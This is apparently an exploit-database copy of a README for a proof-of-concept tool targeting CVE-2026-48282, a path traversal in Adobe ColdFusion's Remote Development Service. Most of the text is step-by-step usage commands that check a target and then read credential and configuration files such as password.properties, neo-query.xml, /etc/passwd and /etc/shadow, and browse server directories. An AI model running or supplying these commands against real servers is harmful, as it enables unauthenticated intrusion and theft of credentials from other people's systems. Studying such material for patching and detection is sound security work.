Share
## https://sploitus.com/exploit?id=E61ECA10-8CD1-5D13-AC33-66B7D37853AB
# CVE-2026-48282-POC
**CVE-2026-48282** is a **path traversal** vulnerability in **Adobe ColdFusion's Remote Development Service (RDS)** with a CVSS score of **10.0 (Critical)**. It allows unauthenticated attackers to read & write arbitrary files via the `/CFIDE/main/ide.cfm` endpoint, leading to **Remote Code Execution (RCE)**.
## Installation
```bash
# Clone the repository
git clone https://github.com//CVE-2026-48282.git
cd CVE-2026-48282
# Install dependencies (only requires `requests`)
pip install -r requirements.txt
```
# Usage
### Step 1 โ Check if a target is vulnerable
```bash
python cve-2026-48282.py -t http://target.com --check
```
```
### Step 2 โ Read sensitive files
Once confirmed vulnerable, extract credentials and configuration:
```bash
# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\password.properties"
# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\neo-query.xml"
# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow
# Save output to a file
python cve-2026-48282.py -t http://target.com --read "C:\\boot.ini" -o boot.ini
```
### Step 3 โ Browse directories
```bash
# List root directory
python cve-2026-48282.py -t http://target.com --browse "C:\\"
```